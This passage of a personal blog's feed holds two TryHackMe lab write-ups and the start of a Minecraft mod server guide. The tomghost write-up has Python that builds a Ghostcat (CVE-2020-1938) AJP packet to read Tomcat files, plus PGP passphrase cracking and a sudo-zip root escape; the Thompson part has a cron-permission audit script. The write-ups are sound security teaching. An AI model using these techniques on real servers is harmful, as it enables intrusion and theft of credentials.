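<p class="wp-block-paragraph">The check that makes this privilege escalation reliable (rather than a lucky guess) is the one described above: find scheduled jobs whose script a low-privileged user can rewrite. The following Python is an added example written for this write-up; it is not part of the room or the original post. It parses <code>/etc/crontab</code>-style lines, resolves the script each job executes (following a leading <code>cd DIR &amp;&amp;</code>, which is how such jobs are often written), and reports scripts that are writable by others. The crontab text and the staged directory tree are constructed for the demo; point <code>world_writable_cron_scripts</code> at the real <code>/etc/crontab</code> contents with the default <code>fs_root</code> to run it on a target.</p>

```python
import os
import re
import stat
import tempfile

# Constructed sample crontab (not taken from the room): a root job that runs a
# script out of an ordinary user's home directory every minute.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*  *    * * *   root    cd /home/jack && bash id.sh
"""


def parse_crontab(text):
    """Yield (user, command) pairs from a system crontab (/etc/crontab format:
    five time fields, a user field, then the command)."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if "=" in fields[0] or len(fields) < 7:   # env assignment or malformed
            continue
        yield fields[5], fields[6]


def script_candidates(command):
    """Return the absolute paths a cron command line refers to.
    Tracks 'cd DIR' across && / || / ; so 'cd /home/jack && bash id.sh'
    resolves to /home/jack/id.sh; bare program names are left to PATH."""
    cwd = "/"
    paths = []
    for segment in re.split(r"\s*(?:&&|\|\||;)\s*", command):
        tokens = segment.split()
        if not tokens:
            continue
        if tokens[0] == "cd":
            cwd = tokens[1] if len(tokens) > 1 else "/"
            continue
        for tok in tokens:
            if tok.startswith("-"):            # an option, not a path
                continue
            if tok.startswith("/"):
                paths.append(tok)
            elif "/" in tok or "." in tok:     # relative path or script name
                paths.append(os.path.normpath(os.path.join(cwd, tok)))
    return paths


def world_writable_cron_scripts(crontab_text, fs_root="/"):
    """Return [(user, path)] for jobs whose script is writable by others.
    fs_root lets the same check run against a staged directory tree."""
    findings = []
    for user, command in parse_crontab(crontab_text):
        for path in script_candidates(command):
            real = os.path.join(fs_root, path.lstrip("/"))
            try:
                st = os.stat(real)
            except FileNotFoundError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH:
                findings.append((user, path))
    return findings


def demo():
    """Stage a fake root containing a world-writable /home/jack/id.sh (the
    misconfiguration from the room) and run the check against it."""
    with tempfile.TemporaryDirectory() as root:
        script_dir = os.path.join(root, "home", "jack")
        os.makedirs(script_dir)
        script = os.path.join(script_dir, "id.sh")
        with open(script, "w") as fh:
            fh.write("#!/bin/bash\nid > test.txt\n")
        os.chmod(script, 0o777)            # -rwxrwxrwx: anyone can rewrite it
        return world_writable_cron_scripts(SAMPLE_CRONTAB, fs_root=root)


if __name__ == "__main__":
    for user, path in demo():
        print(f"{user} runs {path}, which is world-writable")
```

<p class="wp-block-paragraph">The same idea extends to directories: a script that is not itself writable can still be replaced if its parent directory is, so a fuller audit also checks <code>S_IWOTH</code> on each path component.</p>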



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">To conclude, TryHackMe: Thompson presented a nice challenge for FIT and bsides Guatemala CTFs. In my experience, gaining initial access to Tomcat&#8217;s system was trivial but I enjoyed misusing file permissions to read protected files. Running web applications like Tomcat with default credentials is asking for your system to get owned!</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="307" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/06/Task-1-Solutions-1024x307.png?resize=1024%2C307" alt="TryHackMe: Thompson Task 1 Solutions" class="wp-image-1148" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/Task-1-Solutions.png?resize=1024%2C307&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/Task-1-Solutions.png?resize=300%2C90&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/Task-1-Solutions.png?resize=768%2C230&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/Task-1-Solutions.png?w=1208&amp;ssl=1 1208w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<p>The post <a href="https://eric.cc/tryhackme-thompson/">TryHackMe: Thompson</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://eric.cc/tryhackme-thompson/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">487</post-id>	</item>
		<item>
		<title>TryHackMe: tomghost</title>
		<link>https://eric.cc/tryhackme-tomghost/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=tryhackme-tomghost</link>
					<comments>https://eric.cc/tryhackme-tomghost/#respond</comments>
		
		<dc:creator><![CDATA[eric]]></dc:creator>
		<pubDate>Mon, 01 May 2023 00:18:12 +0000</pubDate>
				<category><![CDATA[Write Ups]]></category>
		<category><![CDATA[TryHackMe]]></category>
		<guid isPermaLink="false">https://eric.cc/?p=492</guid>

					<description><![CDATA[<p><a href="https://eric.cc/tryhackme-tomghost/">TryHackMe: tomghost</a><br />
<a href="https://eric.cc">Eric Logan</a></p>
<p>Introduction Apache Tomcat is an open-source web server that can deploy and run Java-based web applications. In 2020 a vulnerability dubbed GhostCat was discovered, allowing attackers to read or include files from the host system. In this room, TryHackMe tomghost, your goal is to use the GhostCat exploit to read files, gain user access, decrypt [&#8230;]</p>
<p>The post <a href="https://eric.cc/tryhackme-tomghost/">TryHackMe: tomghost</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://eric.cc/tryhackme-tomghost/">TryHackMe: tomghost</a><br />
<a href="https://eric.cc">Eric Logan</a></p>

<h2 class="wp-block-heading">Introduction</h2>



<p class="wp-block-paragraph">Apache Tomcat is an open-source web server and servlet container that deploys and runs Java-based web applications. In 2020 a vulnerability dubbed Ghostcat was disclosed in its AJP connector, allowing attackers to read files from inside a deployed web application (and, if they can also upload a file, include it as a JSP). In this room, <a href="https://tryhackme.com/room/tomghost">TryHackMe tomghost</a>, your goal is to use the Ghostcat exploit to read files, gain user access, decrypt PGP files, and escalate to root privileges.</p>



<h2 class="wp-block-heading">Information Gathering</h2>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="541" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/14.-Task-1-1024x541.png?resize=1024%2C541" alt="tomghost tasks" class="wp-image-917" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/14.-Task-1.png?resize=1024%2C541&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/14.-Task-1.png?resize=300%2C158&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/14.-Task-1.png?resize=768%2C406&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/14.-Task-1.png?w=1208&amp;ssl=1 1208w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Tasks</figcaption></figure>



<p class="wp-block-paragraph">As always, we use our trusty Nmap tool to scan the ports to see what services are running on this machine.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="759" height="377" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/1.-nmap.png?resize=759%2C377" alt="tomghost nmap results" class="wp-image-916" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/1.-nmap.png?w=759&amp;ssl=1 759w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/1.-nmap.png?resize=300%2C149&amp;ssl=1 300w" sizes="(max-width: 759px) 100vw, 759px" /><figcaption class="wp-element-caption">Nmap results</figcaption></figure>



<p class="wp-block-paragraph">Port 8080 is serving Apache Tomcat 9.0.30, a version affected by Ghostcat. The AJP connector that the exploit targets is a separate listener, on port 8009 by default, so confirm that the scan shows it open as well.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1000" height="716" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/2.-apache-tomcat.png?resize=1000%2C716" alt="Tomcat dashboard" class="wp-image-918" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/2.-apache-tomcat.png?w=1000&amp;ssl=1 1000w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/2.-apache-tomcat.png?resize=300%2C215&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/2.-apache-tomcat.png?resize=768%2C550&amp;ssl=1 768w" sizes="(max-width: 1000px) 100vw, 1000px" /><figcaption class="wp-element-caption">tomcat dashboard</figcaption></figure>



<h2 class="wp-block-heading">Exploitation</h2>



<p class="wp-block-paragraph">Tomcat 9.0.30 (along with every release before 9.0.31, 8.5.51, and 7.0.100) is vulnerable in its Apache JServ Protocol (AJP) connector. <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1938">CVE-2020-1938</a> lets an attacker who can reach the AJP port read, and in some cases include, files inside the web application because &#8220;Tomcat treats AJP connections as having higher trust&#8221; than HTTP connections and accepts request attributes supplied by the peer.</p>



<figure class="wp-block-image size-large is-resized"><img data-recalc-dims="1" loading="lazy" decoding="async" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/4.-searchsploit-1024x234.png?resize=840%2C191" alt="" class="wp-image-921" width="840" height="191" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/4.-searchsploit.png?resize=1024%2C234&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/4.-searchsploit.png?resize=300%2C69&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/4.-searchsploit.png?resize=768%2C176&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/4.-searchsploit.png?w=1413&amp;ssl=1 1413w" sizes="(max-width: 840px) 100vw, 840px" /><figcaption class="wp-element-caption">tomcat exploit</figcaption></figure>



<p class="wp-block-paragraph">Somebody already wrote an <a href="https://www.exploit-db.com/exploits/48143">exploit</a> for this vulnerability. After downloading it, we run the Python script against the target, pointing it at the AJP port rather than the HTTP port.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="618" height="633" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/6.-ghostcat.png?resize=618%2C633" alt="Running ghostcat exploit" class="wp-image-922" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/6.-ghostcat.png?w=618&amp;ssl=1 618w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/6.-ghostcat.png?resize=293%2C300&amp;ssl=1 293w" sizes="(max-width: 618px) 100vw, 618px" /><figcaption class="wp-element-caption">tomcat exploit</figcaption></figure>



<p class="wp-block-paragraph">The script requests <code>/asdf</code>, an arbitrary path that routes to the web application, while its AJP request attributes point Tomcat at <code>WEB-INF/web.xml</code>; what comes back is that deployment descriptor, metadata included. The description element contains something that looks like login credentials.  </p>
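<p class="wp-block-paragraph">To see why a vulnerable connector hands over the file, it helps to look at the AJP13 Forward Request the exploit sends. The block below is an added example written for this write-up, not the Exploit-DB script and not code from the room: it assembles the packet byte for byte, sets the three <code>javax.servlet.include.*</code> request attributes that Ghostcat abuses (these are the real servlet attribute names), and decodes the packet again the way the connector would. The server name, the <code>/asdf</code> path and port 8009 are placeholders; actually sending the bytes over a socket and reading the SEND_BODY_CHUNK replies that carry the file is left to the public script.</p>

```python
import struct

AJP_MAGIC_REQ = b"\x12\x34"     # client -> container packets start with 0x1234
JK_FORWARD_REQUEST = 2          # prefix code for a Forward Request
METHOD_GET = 2                  # AJP method codes: OPTIONS=1, GET=2, HEAD=3, POST=4
SC_A_REQ_ATTRIBUTE = 0x0A       # attribute code: arbitrary name/value request attribute
SC_A_ARE_DONE = 0xFF            # attribute list terminator


def ajp_string(s):
    """Encode an AJP string: 2-byte big-endian length, bytes, NUL; None -> 0xFFFF."""
    if s is None:
        return b"\xff\xff"
    data = s.encode()
    return struct.pack(">H", len(data)) + data + b"\x00"


def forward_request(req_uri, server_name, server_port=8009, attributes=()):
    """Assemble a complete AJP13 Forward Request packet with no HTTP headers
    and the given (name, value) request attributes."""
    body = bytes([JK_FORWARD_REQUEST, METHOD_GET])
    body += ajp_string("HTTP/1.1")       # protocol
    body += ajp_string(req_uri)          # req_uri
    body += ajp_string("127.0.0.1")      # remote_addr (whatever the peer claims)
    body += ajp_string(None)             # remote_host
    body += ajp_string(server_name)      # server_name
    body += struct.pack(">H", server_port)
    body += b"\x00"                      # is_ssl = false
    body += struct.pack(">H", 0)         # num_headers
    for name, value in attributes:
        body += bytes([SC_A_REQ_ATTRIBUTE]) + ajp_string(name) + ajp_string(value)
    body += bytes([SC_A_ARE_DONE])
    return AJP_MAGIC_REQ + struct.pack(">H", len(body)) + body


def ghostcat_read_request(path, server_name, req_uri="/asdf"):
    """Ghostcat (CVE-2020-1938): the javax.servlet.include.* attributes are
    meant to be set by the container itself for internal includes, but a
    vulnerable Tomcat accepts them from the AJP peer, so DefaultServlet serves
    `path` relative to the webapp root (e.g. WEB-INF/web.xml). req_uri is any
    path that routes to the web application."""
    attrs = [
        ("javax.servlet.include.request_uri", "/"),
        ("javax.servlet.include.path_info", path),
        ("javax.servlet.include.servlet_path", "/"),
    ]
    return forward_request(req_uri, server_name, attributes=attrs)


def _read_string(buf, off):
    (n,) = struct.unpack_from(">H", buf, off)
    off += 2
    if n == 0xFFFF:
        return None, off
    return buf[off:off + n].decode(), off + n + 1   # skip the NUL


def parse_forward_request(packet):
    """Decode a Forward Request packet into a dict, checking the framing;
    this is the connector's view of what we sent."""
    if packet[:2] != AJP_MAGIC_REQ:
        raise ValueError("bad magic")
    (length,) = struct.unpack_from(">H", packet, 2)
    body = packet[4:4 + length]
    if len(body) != length or body[0] != JK_FORWARD_REQUEST:
        raise ValueError("truncated or not a Forward Request")
    out, off = {"method": body[1]}, 2
    for key in ("protocol", "req_uri", "remote_addr", "remote_host", "server_name"):
        out[key], off = _read_string(body, off)
    (out["server_port"],) = struct.unpack_from(">H", body, off)
    off += 2
    out["is_ssl"] = bool(body[off])
    off += 1
    (num_headers,) = struct.unpack_from(">H", body, off)
    off += 2
    for _ in range(num_headers):                 # name is a 0xA0xx code or a string
        if body[off] == 0xA0:
            off += 2
        else:
            _, off = _read_string(body, off)
        _, off = _read_string(body, off)         # header value
    attrs = {}
    while body[off] != SC_A_ARE_DONE:
        code, off = body[off], off + 1
        if code != SC_A_REQ_ATTRIBUTE:
            raise ValueError(f"unhandled attribute code {code:#x}")
        name, off = _read_string(body, off)
        value, off = _read_string(body, off)
        attrs[name] = value
    out["attributes"] = attrs
    return out


if __name__ == "__main__":
    pkt = ghostcat_read_request("WEB-INF/web.xml", server_name="10.10.10.10")
    print(pkt.hex())
    print(parse_forward_request(pkt))
```

<p class="wp-block-paragraph">Nothing in the packet is authenticated: the connector believes the remote address, the server name and, on vulnerable versions, the include attributes, which is exactly why the fix was to stop listening on all interfaces and to require a shared secret.</p>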



<h2 class="wp-block-heading">Post Exploitation</h2>



<p class="wp-block-paragraph">Returning to our Nmap scan, we can see that SSH is open on this machine. Let&#8217;s see whether the credentials from web.xml let us log in to the skyfuck account.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="648" height="526" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/7.-user.txt.png?resize=648%2C526" alt="tomghost user.txt" class="wp-image-923" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/7.-user.txt.png?w=648&amp;ssl=1 648w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/7.-user.txt.png?resize=300%2C244&amp;ssl=1 300w" sizes="(max-width: 648px) 100vw, 648px" /><figcaption class="wp-element-caption">user.txt</figcaption></figure>



<p class="wp-block-paragraph">Changing directory to Merlin&#8217;s home directory, we find the <code>user.txt</code> flag.</p>



<p class="wp-block-paragraph">Back in skyfuck&#8217;s home directory there are two files, <code>credential.pgp</code> and <code>tryhackme.asc</code>. The .asc file is an ASCII-armored PGP private key protected by a passphrase; gpg2john extracts that passphrase hash into a format John the Ripper can crack.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="924" height="567" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/8.-gpg2john.png?resize=924%2C567" alt="Decrypting PGP " class="wp-image-924" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/8.-gpg2john.png?w=924&amp;ssl=1 924w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/8.-gpg2john.png?resize=300%2C184&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/8.-gpg2john.png?resize=768%2C471&amp;ssl=1 768w" sizes="(max-width: 924px) 100vw, 924px" /><figcaption class="wp-element-caption">cracked .asc and pgp</figcaption></figure>



<p class="wp-block-paragraph">Running John the Ripper against the extracted hash with the rockyou.txt wordlist recovers the passphrase for the .asc key by dictionary attack. </p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="936" height="341" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/9.-passphrase.png?resize=936%2C341" alt="Decrypting PGP " class="wp-image-926" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/9.-passphrase.png?w=936&amp;ssl=1 936w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/9.-passphrase.png?resize=300%2C109&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/9.-passphrase.png?resize=768%2C280&amp;ssl=1 768w" sizes="(max-width: 936px) 100vw, 936px" /></figure>



<p class="wp-block-paragraph">Import <code>tryhackme.asc</code> with gpg and enter the passphrase <strong>alexandru</strong> when prompted. It is an OpenPGP secret key for stuxnet@tryhackme.com.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="638" height="265" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/10.-decrypted.png?resize=638%2C265" alt="PGP contents" class="wp-image-927" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/10.-decrypted.png?w=638&amp;ssl=1 638w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/10.-decrypted.png?resize=300%2C125&amp;ssl=1 300w" sizes="(max-width: 638px) 100vw, 638px" /></figure>



<p class="wp-block-paragraph">With that key imported we can decrypt the <code>credential.pgp</code> file and read Merlin&#8217;s login information.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="748" height="151" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/11.-sudo-l.png?resize=748%2C151" alt="Privilege escalation tomghost" class="wp-image-928" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/11.-sudo-l.png?w=748&amp;ssl=1 748w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/11.-sudo-l.png?resize=300%2C61&amp;ssl=1 300w" sizes="(max-width: 748px) 100vw, 748px" /><figcaption class="wp-element-caption">privilege escalation</figcaption></figure>



<p class="wp-block-paragraph">After logging into Merlin&#8217;s account we still do not have root. However, running sudo -l shows that Merlin is allowed to run the zip command as root through sudo.</p>



<p class="wp-block-paragraph">GTFOBins lists zip among the binaries that can break out to a shell: its -T option tests the archive by running the command supplied with -TT, and when zip itself runs under sudo that command runs as root.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="824" height="208" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/12.-gtfobins.png?resize=824%2C208" alt="Gtfobins results" class="wp-image-929" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/12.-gtfobins.png?w=824&amp;ssl=1 824w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/12.-gtfobins.png?resize=300%2C76&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/12.-gtfobins.png?resize=768%2C194&amp;ssl=1 768w" sizes="(max-width: 824px) 100vw, 824px" /><figcaption class="wp-element-caption">gtfobins results</figcaption></figure>



<p class="wp-block-paragraph">Finally, we run the command and land in a root shell.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="452" height="229" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/13.-root.txt.png?resize=452%2C229" alt="tomghost root.txt" class="wp-image-931" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/13.-root.txt.png?w=452&amp;ssl=1 452w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/13.-root.txt.png?resize=300%2C152&amp;ssl=1 300w" sizes="(max-width: 452px) 100vw, 452px" /><figcaption class="wp-element-caption">root.txt</figcaption></figure>



<p class="wp-block-paragraph">We can finally navigate to the root directory and read out the <code>root.txt</code> flag.</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">In conclusion, this exploit existed because Tomcat treated the AJP connector as a trusted channel and honoured request attributes supplied by whoever could reach it. The fixed releases (9.0.31, 8.5.51 and 7.0.100) leave the AJP connector disabled by default, bind it to loopback and require a shared secret; the operational lesson holds on any version: never expose port 8009 beyond the reverse proxy that needs it, and never trust input simply because it arrives over an internal protocol. </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="542" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/15.-Task-1-Solutions-1024x542.png?resize=1024%2C542" alt="tomghost Tasks solutions" class="wp-image-925" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/15.-Task-1-Solutions.png?resize=1024%2C542&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/15.-Task-1-Solutions.png?resize=300%2C159&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/15.-Task-1-Solutions.png?resize=768%2C406&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/15.-Task-1-Solutions.png?w=1208&amp;ssl=1 1208w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Task Solutions</figcaption></figure>
<p>The post <a href="https://eric.cc/tryhackme-tomghost/">TryHackMe: tomghost</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://eric.cc/tryhackme-tomghost/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">492</post-id>	</item>
		<item>
		<title>Install Pixelmon Minecraft mod on Linux Server</title>
		<link>https://eric.cc/install-pixelmon-server/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=install-pixelmon-server</link>
					<comments>https://eric.cc/install-pixelmon-server/#respond</comments>
		
		<dc:creator><![CDATA[eric]]></dc:creator>
		<pubDate>Wed, 01 Feb 2023 15:45:00 +0000</pubDate>
				<category><![CDATA[Miscellaneous]]></category>
		<category><![CDATA[Minecraft]]></category>
		<category><![CDATA[Pixelmon]]></category>
		<guid isPermaLink="false">https://eric.cc/?p=941</guid>

					<description><![CDATA[<p><a href="https://eric.cc/install-pixelmon-server/">Install Pixelmon Minecraft mod on Linux Server</a><br />
<a href="https://eric.cc">Eric Logan</a></p>
<p>Installation guide for downloading Pixelmon with a forge modded Minecraft server. Learn how to install it on a Linux server with no overhead!</p>
<p>The post <a href="https://eric.cc/install-pixelmon-server/">Install Pixelmon Minecraft mod on Linux Server</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://eric.cc/install-pixelmon-server/">Install Pixelmon Minecraft mod on Linux Server</a><br />
<a href="https://eric.cc">Eric Logan</a></p>

<h2 class="wp-block-heading">Introduction</h2>



<p class="wp-block-paragraph">I have seen plenty of tutorials circulating online on how to install mods on a Minecraft server, most specifically Pixelmon. To summarize, their solution was to go pay for their <em>proprietary</em> Minecraft hosting/admin panels for ease of installation.</p>



<p class="wp-block-paragraph">This tutorial can be seen as a general guide on installing Forge modded Minecraft servers with the example being Pixelmon for Minecraft Version 1.12.2.</p>



<h2 class="wp-block-heading">Prerequisites</h2>



<p class="wp-block-paragraph">This guide covers installing the Pixelmon server on top of a Forge server on a Linux host.</p>



<ul class="wp-block-list">
<li>Operating System: Ubuntu Linux server</li>



<li><a href="https://www.wikihow.com/Install-Minecraft-Forge">How to download Minecraft 1.12.2 forge client</a></li>



<li><a href="https://pixelmonmod.com/wiki/Installation">How to download Pixelmon mod</a></li>
</ul>



<h2 class="wp-block-heading">Installation</h2>



<p class="wp-block-paragraph">Firstly, we want to create a directory where we want to deploy this Minecraft server. Once that is done, we can change our working directory to it and begin downloading <em>Minecraft-Forge-installer.jar</em> onto the server.</p>



<p class="wp-block-paragraph"><strong>Forge 1.12 server jar download </strong></p>



<p class="wp-block-paragraph"><code>wget https://maven.minecraftforge.net/net/minecraftforge/forge/1.12.2-14.23.5.2860/forge-1.12.2-14.23.5.2860-installer.jar</code></p>



<p class="wp-block-paragraph"><strong>Install forge server</strong></p>



<p class="wp-block-paragraph">Now that that jar file has been successfully downloaded to our server, we can run the following command to start the server installation process.</p>



<p class="wp-block-paragraph"><code>java -jar forge-1.12.2-14.23.5.2860-installer.jar --installServer</code></p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1021" height="173" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/01/Screenshot_1-2.png?resize=1021%2C173" alt="installing forge server " class="wp-image-970" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_1-2.png?w=1021&amp;ssl=1 1021w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_1-2.png?resize=300%2C51&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_1-2.png?resize=768%2C130&amp;ssl=1 768w" sizes="(max-width: 1021px) 100vw, 1021px" /><figcaption class="wp-element-caption">Installing Forge Server</figcaption></figure>



<p class="wp-block-paragraph"><strong>Troubleshoot</strong> (optional)</p>



<p class="wp-block-paragraph"><code>Command 'java' not found, but can be installed with: error</code></p>



<p class="wp-block-paragraph">Java does not come preinstalled on most fresh Linux servers. Luckily the error tells you how to install it. Forge for Minecraft 1.12.2 targets Java 8, and I found that OpenJDK version 1.8.0 worked the best with the mods and premade adventure maps. </p>



<p class="wp-block-paragraph"><code>sudo apt install openjdk-8-jre-headless</code></p>



<p class="wp-block-paragraph">Then run the install forge server command again.</p>



<p class="wp-block-paragraph"><strong>Run forge server</strong></p>



<p class="wp-block-paragraph">Time to finally run this thing!</p>



<p class="wp-block-paragraph"><code>java -jar forge-1.12.2-14.23.5.2860.jar --nogui</code></p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="445" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/01/Screenshot_2-1.png?resize=1024%2C445" alt="failed to accept Minecraft's EULA" class="wp-image-971" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_2-1.png?w=1024&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_2-1.png?resize=300%2C130&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_2-1.png?resize=768%2C334&amp;ssl=1 768w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Failed to load eula.txt!</figcaption></figure>



<p class="wp-block-paragraph">Now what??</p>



<p class="wp-block-paragraph"><strong>Accept Eula</strong></p>



<p class="wp-block-paragraph"><code>Failed to load eula.txt</code></p>



<p class="wp-block-paragraph">Before a Minecraft server will start, you need to accept Mojang&#8217;s EULA. An EULA, or end-user license agreement, specifies in detail the rights and restrictions that apply to the use of the software.</p>



<p class="wp-block-paragraph">We can accept it by editing the .txt file in nano.</p>



<ul class="wp-block-list">
<li><code>nano eula.txt</code></li>



<li>Change <code>eula=false</code> to <code>eula=true</code></li>



<li>Ctrl+X, then Y and Enter to save and exit</li>
</ul>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="162" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/01/Screenshot_3-2.png?resize=1024%2C162" alt="accepting Minecraft's Eula" class="wp-image-972" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_3-2.png?w=1024&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_3-2.png?resize=300%2C47&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_3-2.png?resize=768%2C122&amp;ssl=1 768w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Eula.txt</figcaption></figure>



